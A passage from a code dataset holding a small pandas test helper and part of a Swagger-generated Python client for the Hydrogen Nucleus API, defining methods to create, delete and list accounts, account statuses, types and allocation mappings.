|
300a5856de402d52342523c6138751a5ca7e07a8
|
[
"MIT"
] | null | null | null |
tests/helpers.py
|
jackson-waschura/marine-acoustics-2021
|
300a5856de402d52342523c6138751a5ca7e07a8
|
[
"MIT"
] | null | null | null |
tests/helpers.py
|
jackson-waschura/marine-acoustics-2021
|
300a5856de402d52342523c6138751a5ca7e07a8
|
[
"MIT"
] | 2
|
2022-01-13T16:16:28.000Z
|
2022-01-20T17:39:51.000Z
|
from pandas.testing import assert_frame_equal
def assert_frame_equal_no_index(df1, df2):
assert_frame_equal(df1.reset_index(drop=True), df2.reset_index(drop=True))
| 42
| 78
| 0.827381
| 28
| 168
| 4.607143
| 0.535714
| 0.255814
| 0.372093
| 0.27907
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025806
| 0.077381
| 168
| 4
| 78
| 42
| 0.806452
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0.333333
| false
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
ad9a826d7755b6ad7783c30d7030332d476d292b
| 135,469
|
py
|
Python
|
atom/nucleus/python/nucleus_api/api/account_api.py
|
AbhiGupta03/SDK
|
f3a61aae7a847f07f0c22a154ca88dc378e9d25e
|
[
"Apache-2.0"
] | null | null | null |
atom/nucleus/python/nucleus_api/api/account_api.py
|
AbhiGupta03/SDK
|
f3a61aae7a847f07f0c22a154ca88dc378e9d25e
|
[
"Apache-2.0"
] | null | null | null |
atom/nucleus/python/nucleus_api/api/account_api.py
|
AbhiGupta03/SDK
|
f3a61aae7a847f07f0c22a154ca88dc378e9d25e
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Hydrogen Nucleus API
The Hydrogen Nucleus API # noqa: E501
OpenAPI spec version: 1.9.5
Contact: info@hydrogenplatform.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from nucleus_api.api_client import ApiClient
class AccountApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_account_allocation_mapping_using_post(self, alloc_request, **kwargs): # noqa: E501
"""Create an account allocation # noqa: E501
Create an account-allocation mapping for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_account_allocation_mapping_using_post(alloc_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param AccountAllocationMapping alloc_request: allocRequest (required)
:return: AccountAllocationMapping
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_account_allocation_mapping_using_post_with_http_info(alloc_request, **kwargs) # noqa: E501
else:
(data) = self.create_account_allocation_mapping_using_post_with_http_info(alloc_request, **kwargs) # noqa: E501
return data
def create_account_allocation_mapping_using_post_with_http_info(self, alloc_request, **kwargs): # noqa: E501
"""Create an account allocation # noqa: E501
Create an account-allocation mapping for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_account_allocation_mapping_using_post_with_http_info(alloc_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param AccountAllocationMapping alloc_request: allocRequest (required)
:return: AccountAllocationMapping
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['alloc_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_account_allocation_mapping_using_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'alloc_request' is set
if self.api_client.client_side_validation and ('alloc_request' not in params or
params['alloc_request'] is None): # noqa: E501
raise ValueError("Missing the required parameter `alloc_request` when calling `create_account_allocation_mapping_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'alloc_request' in params:
body_params = params['alloc_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_allocation', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountAllocationMapping', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_account_status_using_post(self, account_status_request, **kwargs): # noqa: E501
"""Create an account status # noqa: E501
Create an account status record for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_account_status_using_post(account_status_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param AccountStatus account_status_request: accountStatusRequest (required)
:return: AccountStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_account_status_using_post_with_http_info(account_status_request, **kwargs) # noqa: E501
else:
(data) = self.create_account_status_using_post_with_http_info(account_status_request, **kwargs) # noqa: E501
return data
def create_account_status_using_post_with_http_info(self, account_status_request, **kwargs): # noqa: E501
"""Create an account status # noqa: E501
Create an account status record for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_account_status_using_post_with_http_info(account_status_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param AccountStatus account_status_request: accountStatusRequest (required)
:return: AccountStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_status_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_account_status_using_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_status_request' is set
if self.api_client.client_side_validation and ('account_status_request' not in params or
params['account_status_request'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_status_request` when calling `create_account_status_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'account_status_request' in params:
body_params = params['account_status_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_status', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountStatus', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_account_type_using_post(self, account_type_request, **kwargs): # noqa: E501
"""Create an account type # noqa: E501
Create a new account type for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_account_type_using_post(account_type_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param AccountType account_type_request: accountTypeRequest (required)
:return: AccountType
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_account_type_using_post_with_http_info(account_type_request, **kwargs) # noqa: E501
else:
(data) = self.create_account_type_using_post_with_http_info(account_type_request, **kwargs) # noqa: E501
return data
def create_account_type_using_post_with_http_info(self, account_type_request, **kwargs): # noqa: E501
"""Create an account type # noqa: E501
Create a new account type for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_account_type_using_post_with_http_info(account_type_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param AccountType account_type_request: accountTypeRequest (required)
:return: AccountType
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_type_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_account_type_using_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_type_request' is set
if self.api_client.client_side_validation and ('account_type_request' not in params or
params['account_type_request'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_type_request` when calling `create_account_type_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'account_type_request' in params:
body_params = params['account_type_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_type', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountType', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_account_using_post(self, account, **kwargs): # noqa: E501
"""Create an account # noqa: E501
Create an account under a client. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_account_using_post(account, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Account account: account (required)
:return: Account
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_account_using_post_with_http_info(account, **kwargs) # noqa: E501
else:
(data) = self.create_account_using_post_with_http_info(account, **kwargs) # noqa: E501
return data
def create_account_using_post_with_http_info(self, account, **kwargs): # noqa: E501
"""Create an account # noqa: E501
Create an account under a client. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_account_using_post_with_http_info(account, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Account account: account (required)
:return: Account
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_account_using_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account' is set
if self.api_client.client_side_validation and ('account' not in params or
params['account'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account` when calling `create_account_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'account' in params:
body_params = params['account']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Account', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_account_allocation_mapping_using_delete(self, account_allocation_id, **kwargs): # noqa: E501
"""Delete an account allocation # noqa: E501
Permanently delete an account-allocation mapping for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_account_allocation_mapping_using_delete(account_allocation_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_allocation_id: UUID account_allocation_id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_account_allocation_mapping_using_delete_with_http_info(account_allocation_id, **kwargs) # noqa: E501
else:
(data) = self.delete_account_allocation_mapping_using_delete_with_http_info(account_allocation_id, **kwargs) # noqa: E501
return data
def delete_account_allocation_mapping_using_delete_with_http_info(self, account_allocation_id, **kwargs): # noqa: E501
"""Delete an account allocation # noqa: E501
Permanently delete an account-allocation mapping for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_account_allocation_mapping_using_delete_with_http_info(account_allocation_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_allocation_id: UUID account_allocation_id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_allocation_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_account_allocation_mapping_using_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_allocation_id' is set
if self.api_client.client_side_validation and ('account_allocation_id' not in params or
params['account_allocation_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_allocation_id` when calling `delete_account_allocation_mapping_using_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_allocation_id' in params:
path_params['account_allocation_id'] = params['account_allocation_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_allocation/{account_allocation_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_account_permission_using_delete(self, account_id, **kwargs): # noqa: E501
"""Delete an account permission # noqa: E501
Delete an account permission # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_account_permission_using_delete(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: account_id (required)
:return: AccountPermissionVO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_account_permission_using_delete_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.delete_account_permission_using_delete_with_http_info(account_id, **kwargs) # noqa: E501
return data
def delete_account_permission_using_delete_with_http_info(self, account_id, **kwargs): # noqa: E501
"""Delete an account permission # noqa: E501
Delete an account permission # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_account_permission_using_delete_with_http_info(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: account_id (required)
:return: AccountPermissionVO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_account_permission_using_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if self.api_client.client_side_validation and ('account_id' not in params or
params['account_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_id` when calling `delete_account_permission_using_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['account_id'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_permission/{account_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountPermissionVO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_account_status_using_delete(self, account_status_id, **kwargs): # noqa: E501
"""Delete an account status # noqa: E501
Permanently delete an account status record from an account’s history. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_account_status_using_delete(account_status_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_status_id: UUID account_status_id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_account_status_using_delete_with_http_info(account_status_id, **kwargs) # noqa: E501
else:
(data) = self.delete_account_status_using_delete_with_http_info(account_status_id, **kwargs) # noqa: E501
return data
def delete_account_status_using_delete_with_http_info(self, account_status_id, **kwargs): # noqa: E501
"""Delete an account status # noqa: E501
Permanently delete an account status record from an account’s history. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_account_status_using_delete_with_http_info(account_status_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_status_id: UUID account_status_id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_status_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_account_status_using_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_status_id' is set
if self.api_client.client_side_validation and ('account_status_id' not in params or
params['account_status_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_status_id` when calling `delete_account_status_using_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_status_id' in params:
path_params['account_status_id'] = params['account_status_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_status/{account_status_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_account_type_using_delete(self, account_type_id, **kwargs): # noqa: E501
"""Delete an account type # noqa: E501
Permanently delete a possible account type defined for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_account_type_using_delete(account_type_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_type_id: UUID account_type_id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_account_type_using_delete_with_http_info(account_type_id, **kwargs) # noqa: E501
else:
(data) = self.delete_account_type_using_delete_with_http_info(account_type_id, **kwargs) # noqa: E501
return data
def delete_account_type_using_delete_with_http_info(self, account_type_id, **kwargs): # noqa: E501
"""Delete an account type # noqa: E501
Permanently delete a possible account type defined for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_account_type_using_delete_with_http_info(account_type_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_type_id: UUID account_type_id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_type_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_account_type_using_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_type_id' is set
if self.api_client.client_side_validation and ('account_type_id' not in params or
params['account_type_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_type_id` when calling `delete_account_type_using_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_type_id' in params:
path_params['account_type_id'] = params['account_type_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_type/{account_type_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_account_using_delete(self, account_id, **kwargs): # noqa: E501
"""Delete an account # noqa: E501
Permanently delete an account under a client. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_account_using_delete(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: UUID account_id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_account_using_delete_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.delete_account_using_delete_with_http_info(account_id, **kwargs) # noqa: E501
return data
def delete_account_using_delete_with_http_info(self, account_id, **kwargs): # noqa: E501
"""Delete an account # noqa: E501
Permanently delete an account under a client. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_account_using_delete_with_http_info(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: UUID account_id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_account_using_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if self.api_client.client_side_validation and ('account_id' not in params or
params['account_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_id` when calling `delete_account_using_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['account_id'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account/{account_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_all_using_get(self, **kwargs): # noqa: E501
"""List all accounts # noqa: E501
Get information for all accounts for all clients defined for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_all_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageAccount
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_account_all_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_account_all_using_get_with_http_info(**kwargs) # noqa: E501
return data
def get_account_all_using_get_with_http_info(self, **kwargs): # noqa: E501
"""List all accounts # noqa: E501
Get information for all accounts for all clients defined for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_all_using_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageAccount
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['ascending', 'filter', 'order_by', 'page', 'size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_all_using_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'ascending' in params:
query_params.append(('ascending', params['ascending'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageAccount', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_allocation_mapping_all_using_get(self, **kwargs): # noqa: E501
"""List all account allocations # noqa: E501
Get information for all account-allocation mappings for all accounts defined for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_allocation_mapping_all_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageAccountAllocationMapping
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_account_allocation_mapping_all_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_account_allocation_mapping_all_using_get_with_http_info(**kwargs) # noqa: E501
return data
def get_account_allocation_mapping_all_using_get_with_http_info(self, **kwargs): # noqa: E501
"""List all account allocations # noqa: E501
Get information for all account-allocation mappings for all accounts defined for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_allocation_mapping_all_using_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool ascending: ascending
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:return: PageAccountAllocationMapping
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['ascending', 'filter', 'order_by', 'page', 'size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_allocation_mapping_all_using_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'ascending' in params:
query_params.append(('ascending', params['ascending'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_allocation', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageAccountAllocationMapping', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
